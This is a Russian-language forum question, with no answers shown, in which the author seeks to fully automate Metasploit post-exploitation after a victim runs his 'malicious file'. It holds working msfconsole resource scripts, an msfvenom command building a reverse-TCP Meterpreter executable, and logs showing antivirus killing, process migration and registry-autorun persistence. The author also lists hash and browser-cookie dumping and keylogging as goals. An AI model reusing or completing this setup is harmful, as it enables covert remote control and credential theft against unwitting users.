Как полностью автоматизировать метасплоит?

avatar
user3391185
9 августа 2021 в 06:29
249
0
0

я хочу полностью автоматизировать работу модуля 'multi/handler' в metasploit после запуска моего вредоносного файла.

  1. Приобретение прав СИСТЕМЫ
  2. Отключить антивирус
  3. Добавление в автозагрузку
  4. Дамп всех хешей и файлов cookie из навигаторов
  5. Запустить кейлоггер

Эти задачи должны запускаться автоматически для каждого нового сеанса, полученного 'multi/handler'. Вот как я пытаюсь, но в результате я получаю много сессий (без SYSTEM), и после перезагрузки моя сессия не возвращается!!

Пример:

run.rc

use exploit/multi/handler
set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set VERBOSE true
set LHOST 192.168.1.67
set LPORT 4444
exploit -jz

cmd.rc

run post/windows/manage/killav
run post/windows/gather/checkvm
run post/windows/manage/priv_migrate
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe

Начальный сервер:

msfconsole -r ./run.rc

Gen bin:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 -f exe > shell.exe

ВЫВОД:

     [*] Session ID 1 (192.168.1.67:4444 -> 192.168.1.30:49316) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
        [*] Running Command List ...
        [*]     Running command run post/windows/manage/killav
        [*] No target processes were found.
        [*]     Running command run post/windows/gather/checkvm
        [*] Checking if USER- is a Virtual Machine ...
        [+] This is a VirtualBox Virtual Machine
        [*]     Running command run post/windows/manage/priv_migrate
        [*] Current session process is shell.exe (1452) as: user-ПК\user
        [*] Session has User level rights.
        [*] Will attempt to migrate to a User level process.
        [*] Trying explorer.exe (2776)
        [+] Successfully migrated to Explorer.EXE (2776) as: user-ПК\user
        [*]     Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe  
        [*] Running module against USER-
        [*] Reading Payload from file /root/shell.exe
        [+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
        [*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
        [+] Agent executed with PID 2260
        [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ctcAjhNAtgC
        [*] Sending stage (176195 bytes) to 192.168.1.30
        [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ctcAjhNAtgC
        [*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-_20210808.3043/USER-_20210808.3043.rc
        [*] Meterpreter session 2 opened (192.168.1.67:4444 -> 192.168.1.30:49318) at 2021-08-08 15:30:43 -0400
        [*] Session ID 2 (192.168.1.67:4444 -> 192.168.1.30:49318) processing AutoRunScript 'multi_console_command -r /root/cmd.rc'
        [*] Running Command List ...
        [*]     Running command run post/windows/manage/killav
        [*] No target processes were found.
        [*]     Running command run post/windows/gather/checkvm
        [*] Checking if USER- is a Virtual Machine ...
        [+] This is a VirtualBox Virtual Machine
        [*]     Running command run post/windows/manage/priv_migrate
        [*] Current session process is default.exe (2260) as: user-ПК\user
        [*] Session has User level rights.
        [*] Will attempt to migrate to a User level process.
        [*] Trying explorer.exe (2776)
        [+] Successfully migrated to Explorer.EXE (2776) as: user-ПК\user
        [*]     Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe  
        [*] Running module against USER-
        [*] Reading Payload from file /root/shell.exe
        [+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
        [*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
        msf5 exploit(multi/handler) > sessions 

 

    Active sessions
    ===============
     
      Id  Name  Type                     Information           Connection
      --  ----  ----                     -----------           ----------
      1         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49316 (192.168.1.30)
      2         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49318 (192.168.1.30)
      3         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49319 (192.168.1.30)
      4         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49321 (192.168.1.30)
      5         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49323 (192.168.1.30)
      6         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49325 (192.168.1.30)
      7         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49326 (192.168.1.30)
      8         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49328 (192.168.1.30)
      9         meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49329 (192.168.1.30)
      10        meterpreter x64/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49331 (192.168.1.30)
      11        meterpreter x86/windows  user-_\user @ USER-_  192.168.1.67:4444 -> 192.168.1.30:49333 (192.168.1.30)

msf5 exploit(multi/handler) >

я продолжаю получать огромное количество сеансов (я делаю их без остановки)

Источник

Ответы (0)